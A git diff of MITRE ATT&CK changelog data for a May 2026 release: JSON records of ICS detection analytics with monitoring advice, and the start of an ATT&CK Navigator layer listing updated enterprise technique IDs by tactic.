+                    "description": "Monitor for anomalies related to discovery related ICS functions, including devices that have not previously used these functions or for functions being sent to many outstations.\nMonitor for new ICS protocol connections to existing assets or for device scanning (i.e., a host connecting to many devices) over ICS and enterprise protocols (e.g., ICMP, DCOM, WinRM). For added context on adversary enterprise procedures and background see [Remote System Discovery](https://attack.mitre.org/techniques/T1018).\n",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
+                            "name": "Network Traffic",
+                            "channel": "None"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.384000+00:00\", \"old_value\": \"2026-04-24 20:34:03.863000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--67861309-0ba7-4713-843e-3def87e396ec",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 20:45:49.233000+00:00",
+                    "modified": "2026-05-12 16:30:18.378000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0909#AN2052",
+                            "external_id": "AN2052"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2052",
+                    "description": "Monitor for anomalies related to discovery related ICS functions, including devices that have not previously used these functions or for functions being sent to many outstations.\n\nMonitor for new ICS protocol connections to existing assets or for device scanning (i.e., a host connecting to many devices) over ICS and enterprise protocols (e.g., ICMP, DCOM, WinRM). For added context on adversary enterprise procedures and background see [Remote System Discovery](https://attack.mitre.org/techniques/T1018).\n",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
+                            "name": "Network Traffic",
+                            "channel": "None"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.378000+00:00\", \"old_value\": \"2026-04-24 20:33:57.256000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--3f052beb-d384-4ebe-b942-2c4ddeb95833",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 21:47:06.445000+00:00",
+                    "modified": "2026-05-12 16:30:18.377000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0910#AN2053",
+                            "external_id": "AN2053"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2053",
+                    "description": "Monitor asset alarms which may help identify a loss of communications. Consider correlating alarms with other data sources that indicate traffic has been blocked, such as network traffic. In cases where alternative methods of communicating with outstations exist, alarms may still be visible even if messages are blocked.\n\nMonitor for a loss of network communications, which may indicate this technique is being used.\n\nMonitor for lack of operational process data which may help identify a loss of communications. This will not directly detect the technique\u2019s execution but instead may provide additional evidence that the technique has been used and may complement other detections.\n\nMonitor application logs for changes to settings and other events associated with network protocols that may be used to block communications.\n\nMonitor for the termination of processes or services associated with ICS automation protocols and application software which could help detect blocked communications.\n",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e",
+                            "name": "Operational Databases",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
+                            "name": "Network Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95",
+                            "name": "Databases",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "Application Log",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f",
+                            "name": "Process",
+                            "channel": "None"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.377000+00:00\", \"old_value\": \"2026-04-24 20:33:55.408000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--df7f8849-56a7-4e83-9fd7-a4f25227d960",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 22:41:28.415000+00:00",
+                    "modified": "2026-05-12 16:30:18.383000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0911#AN2054",
+                            "external_id": "AN2054"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2054",
+                    "description": "Monitor asset alarms which may help identify a loss of communications. Consider correlating alarms with other data sources that indicate traffic has been blocked, such as network traffic. In cases where alternative methods of communicating with outstations exist, alarms may still be visible even if Ethernet messages are blocked.\n\nMonitor for a loss of network communications, which may indicate this technique is being used.\n\nMonitor for lack of operational process data which may help identify a loss of communications. This will not directly detect the technique\u2019s execution but instead may provide additional evidence that the technique has been used and may complement other detections.\n\nMonitor application logs for changes to settings and other events associated with network protocols that may be used to block communications.\n\nMonitor for the termination of processes or services associated with ICS automation protocols and application software which could help detect blocked communications.\n",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e",
+                            "name": "Operational Databases",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
+                            "name": "Network Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95",
+                            "name": "Databases",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "Application Log",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f",
+                            "name": "Process",
+                            "channel": "None"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.383000+00:00\", \"old_value\": \"2026-04-24 20:34:02.593000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--0b4e7cfa-9f9d-49b0-b5bf-afdf62058c5a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 22:55:44.526000+00:00",
+                    "modified": "2026-05-12 16:30:18.375000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0912#AN2055",
+                            "external_id": "AN2055"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2055",
+                    "description": "Monitor asset alarms which may help identify a loss of communications. Consider correlating alarms with other data sources that indicate traffic has been blocked, such as network traffic. In cases where alternative methods of communicating with outstations exist, alarms may still be visible even if Wi-Fi messages are blocked.\n\nMonitor for a loss of network communications, which may indicate this technique is being used.\n\nMonitor for lack of operational process data which may help identify a loss of communications. This will not directly detect the technique\u2019s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.\n\nMonitor application logs for changes to settings and other events associated with network protocols that may be used to block communications.\n\nMonitor for the termination of processes or services associated with ICS automation protocols and application software which could help detect blocked communications.\n",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e",
+                            "name": "Operational Databases",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
+                            "name": "Network Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95",
+                            "name": "Databases",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "Application Log",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f",
+                            "name": "Process",
+                            "channel": "None"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.375000+00:00\", \"old_value\": \"2026-04-24 20:33:52.139000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--e379be82-39d7-4ae4-8557-f846ba19cd4b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-23 00:08:52.524000+00:00",
+                    "modified": "2026-05-12 16:30:18.383000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0913#AN2056",
+                            "external_id": "AN2056"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2056",
+                    "description": "Monitor device alarms for program downloads, although not all devices produce such alarms.\n\nMonitor for protocol functions related to program download or modification. Program downloads may be observable in ICS automation protocols and remote management protocols.\n\nConsult asset management systems to understand expected program versions.\n\nMonitor devices configuration logs which may contain alerts that indicate whether a program download has occurred. Devices may maintain application logs that indicate whether a full program download, online edit, or program append function has occurred.\n",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298",
+                            "name": "Operational Databases",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b05a614b-033c-4578-b4f2-c63a9feee706",
+                            "name": "Asset",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "Application Log",
+                            "channel": "None"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.383000+00:00\", \"old_value\": \"2026-04-24 20:34:02.964000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--3c6aa6f7-29e9-41d9-8500-30b6d0533d64",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-23 00:31:46.350000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0914#AN2057",
+                            "external_id": "AN2057"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2057",
+                    "description": "Monitor device alarms for program downloads, although not all devices produce such alarms.\n\nMonitor for protocol functions related to program download or modification. Program downloads may be observable in ICS automation protocols and remote management protocols.\n\nConsult asset management systems to understand expected program versions.\n\nMonitor devices configuration logs which may contain alerts that indicate whether a program download has occurred. Devices may maintain application logs that indicate whether a full program download, online edit, or program append function has occurred.\n",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298",
+                            "name": "Operational Databases",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b05a614b-033c-4578-b4f2-c63a9feee706",
+                            "name": "Asset",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "Application Log",
+                            "channel": "None"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-04-24 20:33:55.025000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--22b202f2-d4dd-44dd-b5e1-791ff2aef8ed",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-23 00:42:36.732000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0915#AN2058",
+                            "external_id": "AN2058"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 2058",
+                    "description": "Monitor device alarms for program downloads, although not all devices produce such alarms.\n\nMonitor for protocol functions related to program download or modification. Program downloads may be observable in ICS automation protocols and remote management protocols.\n\nConsult asset management systems to understand expected program versions.\n\nMonitor devices configuration logs which may contain alerts that indicate whether a program download has occurred. Devices may maintain application logs that indicate whether a full program download, online edit, or program append function has occurred.\n",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298",
+                            "name": "Operational Databases",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b05a614b-033c-4578-b4f2-c63a9feee706",
+                            "name": "Asset",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "Application Log",
+                            "channel": "None"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-04-24 20:33:53.216000+00:00\"}}}",
+                    "previous_version": "1.0"
+                }
+            ],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        }
+    },
+    "new-contributors": []
+}
\ No newline at end of file
diff --git a/modules/resources/docs/changelogs/v19.0-v19.1/layer-enterprise.json b/modules/resources/docs/changelogs/v19.0-v19.1/layer-enterprise.json
new file mode 100644
index 00000000000..97f4406147d
--- /dev/null
+++ b/modules/resources/docs/changelogs/v19.0-v19.1/layer-enterprise.json
@@ -0,0 +1,3919 @@
+{
+    "versions": {
+        "layer": "4.5",
+        "navigator": "5.0.0",
+        "attack": "19.1"
+    },
+    "name": "May 2026 Enterprise Updates",
+    "description": "Enterprise updates for the May 2026 release of ATT&CK",
+    "domain": "enterprise-attack",
+    "techniques": [
+        {
+            "techniqueID": "T1548",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1134",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1134",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1087",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1098",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1098",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1557",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1557",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574.014",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574.014",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1059.002",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1550.001",
+            "tactic": "lateral-movement",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1010",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1560",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1560.001",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1588.007",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1573.002",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055.004",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1055.004",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1123",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1683.002",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1119",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1020",
+            "tactic": "exfiltration",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1197",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1197",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1197",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1102.002",
+            "tactic": "command-and-control",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1027.001",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1564.013",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1037",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1037",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1542.003",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1542.003",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1584.005",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1036.009",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1036.012",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1217",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1185",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1110",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1612",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1548.002",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1218.003",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574.012",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1574.012",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1070.003",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1685.006",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1070.008",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1070.007",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1070.009",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1685.005",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1127.002",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1127.002",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1592.004",
+            "tactic": "reconnaissance",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1115",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1059.009",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1585.003",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1078.004",
+            "tactic": "stealth",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1078.004",
+            "tactic": "persistence",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1078.004",
+            "tactic": "privilege-escalation",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1078.004",
+            "tactic": "initial-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1586.003",
+            "tactic": "resource-development",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1651",
+            "tactic": "execution",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1686.001",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1580",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1552.005",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1555.006",
+            "tactic": "credential-access",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1526",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1619",
+            "tactic": "discovery",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1213.003",
+            "tactic": "collection",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1593.003",
+            "tactic": "reconnaissance",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1553.002",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
+            "techniqueID": "T1553.006",
+            "tactic": "defense-impairment",
+            "enabled": true,
+            "color": "#B99095",
+            "comment": "patche"
+        },
+        {
